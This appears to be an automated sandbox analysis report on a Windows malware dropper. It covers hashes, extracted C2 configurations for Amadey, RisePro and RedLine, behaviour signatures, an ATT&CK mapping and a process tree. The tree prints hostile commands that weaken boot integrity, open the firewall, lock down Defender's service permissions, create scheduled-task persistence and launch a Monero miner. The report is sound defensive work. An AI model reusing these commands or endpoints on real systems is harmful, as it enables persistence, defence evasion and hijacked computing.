Analysis

  • max time kernel
    294s
  • max time network
    300s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    16-05-2024 23:42

General

  • Target

    9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe

  • Size

    1.6MB

  • MD5

    bbc637c40171df63142a3e086b7606b8

  • SHA1

    e29da24e8d3864a83195df7f97beba53172fe779

  • SHA256

    9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f

  • SHA512

    6859dfdb4e78c837714127370a22ae3c30798c8c16a9b6e355424ed2facf7dabc561a071f0c34b149ecf0c63068c110c9e53e4d945359d1749c365b8e4390e48

  • SSDEEP

    49152:OFWxRZfKX0sd2dij4pNzG1PXIBHthTP+UHALIucE5G:Oue0tw4nzUPgHtBPIL+EY

Malware Config

Extracted

Family

amadey

Version

4.20

Botnet

18befc

C2

http://5.42.96.141

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

C2

http://5.42.96.7

Attributes
  • install_dir

    7af68cdb52

  • install_file

    axplons.exe

  • strings_key

    e2ce58e78f631ed97d01fe7b70e85d5e

  • url_paths

    /zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 6 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Windows security bypass 2 TTPs 7 IoCs
  • XMRig Miner payload 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 34 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 25 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe
    "C:\Users\Admin\AppData\Local\Temp\9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe"
    1⤵
    • DcRat
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2620
      • C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
        "C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1604
        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
          "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1992
          • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
            "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:280
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 116
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:1088
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3032
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 96
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:2876
          • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
            5⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2916
          • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
            "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
            5⤵
            • DcRat
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:2244
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Program Files (x86)\GameStabilityService\installm.bat" "
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1228
              • C:\Windows\SysWOW64\sc.exe
                Sc delete GameSyncLinks
                7⤵
                • Launches sc.exe
                PID:2368
              • C:\Program Files (x86)\GameStabilityService\GameService.exe
                GameService remove GameSyncLinks confirm
                7⤵
                • Executes dropped EXE
                PID:2676
              • C:\Program Files (x86)\GameStabilityService\GameService.exe
                GameService install GameStabilityService "C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"
                7⤵
                • Executes dropped EXE
                PID:2448
              • C:\Program Files (x86)\GameStabilityService\GameService.exe
                GameService start GameStabilityService
                7⤵
                • Executes dropped EXE
                PID:2424
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
              6⤵
                PID:448
            • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
              "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
              5⤵
              • Executes dropped EXE
              PID:2844
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 96
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2504
            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
              5⤵
              • Executes dropped EXE
              PID:1284
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 52
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2780
            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
              "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies system certificate store
              PID:2912
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                6⤵
                • DcRat
                • Creates scheduled task(s)
                PID:2180
              • C:\Users\Admin\AppData\Local\Temp\1000263001\dl.exe
                "C:\Users\Admin\AppData\Local\Temp\1000263001\dl.exe"
                6⤵
                • Executes dropped EXE
                PID:2960
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000263001\dl.exe" & exit
                  7⤵
                    PID:1664
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "dl.exe" /f
                      8⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                • C:\Users\Admin\AppData\Local\Temp\1000264001\toolspub1.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000264001\toolspub1.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:2144
                • C:\Users\Admin\AppData\Local\Temp\1000265001\4767d2e713f2021e8fe856e3ea638b58.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000265001\4767d2e713f2021e8fe856e3ea638b58.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:952
                  • C:\Users\Admin\AppData\Local\Temp\1000265001\4767d2e713f2021e8fe856e3ea638b58.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000265001\4767d2e713f2021e8fe856e3ea638b58.exe"
                    7⤵
                    • DcRat
                    • Windows security bypass
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Windows security modification
                    • Adds Run key to start application
                    • Checks for VirtualBox DLLs, possible anti-VM trick
                    • Drops file in Windows directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1700
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                      8⤵
                        PID:2732
                        • C:\Windows\system32\netsh.exe
                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                          9⤵
                          • Modifies Windows Firewall
                          • Modifies data under HKEY_USERS
                          PID:1772
                      • C:\Windows\rss\csrss.exe
                        C:\Windows\rss\csrss.exe
                        8⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • Manipulates WinMon driver.
                        • Manipulates WinMonFS driver.
                        • Drops file in Windows directory
                        • Modifies system certificate store
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2428
                        • C:\Windows\system32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          9⤵
                          • DcRat
                          • Creates scheduled task(s)
                          PID:2576
                        • C:\Windows\system32\schtasks.exe
                          schtasks /delete /tn ScheduledUpdate /f
                          9⤵
                            PID:1664
                          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Modifies system certificate store
                            PID:2408
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1096
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2676
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1724
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2196
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1924
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1748
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2724
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2580
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1204
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2512
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2248
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -timeout 0
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2424
                            • C:\Windows\system32\bcdedit.exe
                              C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                              10⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2592
                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                            9⤵
                            • Executes dropped EXE
                            PID:888
                          • C:\Windows\system32\bcdedit.exe
                            C:\Windows\Sysnative\bcdedit.exe /v
                            9⤵
                            • Modifies boot configuration data using bcdedit
                            PID:1556
                          • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                            C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                            9⤵
                            • Executes dropped EXE
                            PID:2320
                          • C:\Windows\system32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                            9⤵
                            • DcRat
                            • Creates scheduled task(s)
                            PID:2052
                          • C:\Windows\windefender.exe
                            "C:\Windows\windefender.exe"
                            9⤵
                            • Executes dropped EXE
                            PID:1356
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                              10⤵
                                PID:2732
                                • C:\Windows\SysWOW64\sc.exe
                                  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                  11⤵
                                  • Launches sc.exe
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2720
                    • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1528
                • C:\Users\Admin\AppData\Local\Temp\1000014001\90d0f49c9f.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000014001\90d0f49c9f.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  PID:612
            • C:\Program Files (x86)\GameStabilityService\GameService.exe
              "C:\Program Files (x86)\GameStabilityService\GameService.exe"
              1⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3060
              • C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe
                "C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                PID:1628
                • C:\Windows\Temp\863463.exe
                  "C:\Windows\Temp\863463.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 86Adxfq6AnkKUZNQwBuLMF9HYKxy399q4GoNvX86ddj4DNkHhKaPCWagERDeBPVYSw76hQwZATyV8GAWhX5g2ujETX6AWcp --coin XMR -t 1 --no-color -p x
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:1304
            • C:\Windows\system32\makecab.exe
              "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240516234255.log C:\Windows\Logs\CBS\CbsPersist_20240516234255.cab
              1⤵
              • Drops file in Windows directory
              PID:1356
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {15D01B05-3F90-4FF5-87DB-1C814C227949} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
              1⤵
                PID:2496
                • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2448
                • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2592
                • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2020
                • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2628
                • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2560
              • C:\Windows\system32\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\C948.bat" "
                1⤵
                  PID:2152
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                    2⤵
                      PID:1924
                  • C:\Windows\system32\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\D8D3.bat" "
                    1⤵
                      PID:2212
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                        2⤵
                          PID:1228
                      • C:\Windows\system32\conhost.exe
                        \??\C:\Windows\system32\conhost.exe "1553379798-558961548-20986825331842011746-971092984-1708824358-1711223152351907430"
                        1⤵
                          PID:1772
                        • C:\Windows\system32\conhost.exe
                          \??\C:\Windows\system32\conhost.exe "-1429065295-532787362-9005644815479182711140019590757932882541705229778476360"
                          1⤵
                            PID:2448
                          • C:\Windows\windefender.exe
                            C:\Windows\windefender.exe
                            1⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            PID:2196
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:108
                          • C:\Windows\system32\AUDIODG.EXE
                            C:\Windows\system32\AUDIODG.EXE 0x554
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3036

                          Network

                          MITRE ATT&CK Matrix ATT&CK v13

                          Execution

                          Command and Scripting Interpreter

                          1
                          T1059

                          System Services

                          1
                          T1569

                          Service Execution

                          1
                          T1569.002

                          Scheduled Task/Job

                          1
                          T1053

                          Persistence

                          Boot or Logon Autostart Execution

                          2
                          T1547

                          Registry Run Keys / Startup Folder

                          2
                          T1547.001

                          Create or Modify System Process

                          2
                          T1543

                          Windows Service

                          2
                          T1543.003

                          Scheduled Task/Job

                          1
                          T1053

                          Privilege Escalation

                          Boot or Logon Autostart Execution

                          2
                          T1547

                          Registry Run Keys / Startup Folder

                          2
                          T1547.001

                          Create or Modify System Process

                          2
                          T1543

                          Windows Service

                          2
                          T1543.003

                          Scheduled Task/Job

                          1
                          T1053

                          Defense Evasion

                          Impair Defenses

                          5
                          T1562

                          Disable or Modify Tools

                          2
                          T1562.001

                          Disable or Modify System Firewall

                          1
                          T1562.004

                          Modify Registry

                          5
                          T1112

                          Virtualization/Sandbox Evasion

                          2
                          T1497

                          Subvert Trust Controls

                          1
                          T1553

                          Install Root Certificate

                          1
                          T1553.004

                          Credential Access

                          Unsecured Credentials

                          2
                          T1552

                          Credentials In Files

                          2
                          T1552.001

                          Discovery

                          Query Registry

                          6
                          T1012

                          Virtualization/Sandbox Evasion

                          2
                          T1497

                          System Information Discovery

                          5
                          T1082

                          Peripheral Device Discovery

                          1
                          T1120

                          Collection

                          Data from Local System

                          2
                          T1005

                          Impact

                          Service Stop

                          1
                          T1489

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Program Files (x86)\GameStabilityService\GameService.exe
                            Filesize

                            288KB

                            MD5

                            d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                            SHA1

                            e1908caab6f938404af85a7df0f80f877a4d9ee6

                            SHA256

                            472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                            SHA512

                            1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                          • C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe
                            Filesize

                            6.2MB

                            MD5

                            c4f2b643c3ff9bb7ae4fd625c9d98154

                            SHA1

                            bd7c7190e45cbda09be256bee7622bb74f75f00c

                            SHA256

                            76b585b4eac7b0584f28d66d6bf37ad29b1ab73354cbd3c5bb1c819787208f0b

                            SHA512

                            2efeaf9473ac1a8f42fd5870154faa37b06e4f331768cd7934fd4aa685eb6da4e28eaa7357807c4bf37dd79fc4a5eaf70ab4324ed0100dcdb4abaf4d9b0a7dcb

                          • C:\Program Files (x86)\GameStabilityService\installm.bat
                            Filesize

                            247B

                            MD5

                            192ae14b572f1bdd164ee67855d5a83a

                            SHA1

                            9cf0757c807a8b834470d216ccd85be9a6b60aa0

                            SHA256

                            2f6be6b40cf7c1802b6540dbf0b90eac67fd6a94067a06090e1f71bee164188d

                            SHA512

                            18fc80eb3d450359863d61cf9123a08cdfe8c52d5f59e97f5b42816584d474d8a080bb75e7fe92480d2961481d59584a3987b2e7a15e611b58885b4441085e3c

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                            Filesize

                            68KB

                            MD5

                            29f65ba8e88c063813cc50a4ea544e93

                            SHA1

                            05a7040d5c127e68c25d81cc51271ffb8bef3568

                            SHA256

                            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

                            SHA512

                            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                            Filesize

                            1KB

                            MD5

                            a266bb7dcc38a562631361bbf61dd11b

                            SHA1

                            3b1efd3a66ea28b16697394703a72ca340a05bd5

                            SHA256

                            df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                            SHA512

                            0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                            Filesize

                            242B

                            MD5

                            df5dd0fd632db39ddd9f9dc3142fd4a9

                            SHA1

                            b2b763da4a5300209074e882b479fdda8d107206

                            SHA256

                            bdd9e308e78c91d2a1810c1aefbf0e930229345bb0717baf7be0ff0cb20f2ecf

                            SHA512

                            68ec393003e6985c0046f90781aade7d0ce8e17118461218eb0f07cae9f5878d0c998ea1e51578a7865b11e3a516753861a2b774d6d79740a16450c46930c8ee

                          • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                            Filesize

                            2.7MB

                            MD5

                            31841361be1f3dc6c2ce7756b490bf0f

                            SHA1

                            ff2506641a401ac999f5870769f50b7326f7e4eb

                            SHA256

                            222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                            SHA512

                            53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
                            Filesize

                            474KB

                            MD5

                            e967f019b01357086d92181e6ee28e0b

                            SHA1

                            7f26480ea5ca0ee9481dfc0bea12194bd6f10283

                            SHA256

                            c69c17f4c6b2206437e7954c02424b80605d40e98c0adcad6839e170c94b1c82

                            SHA512

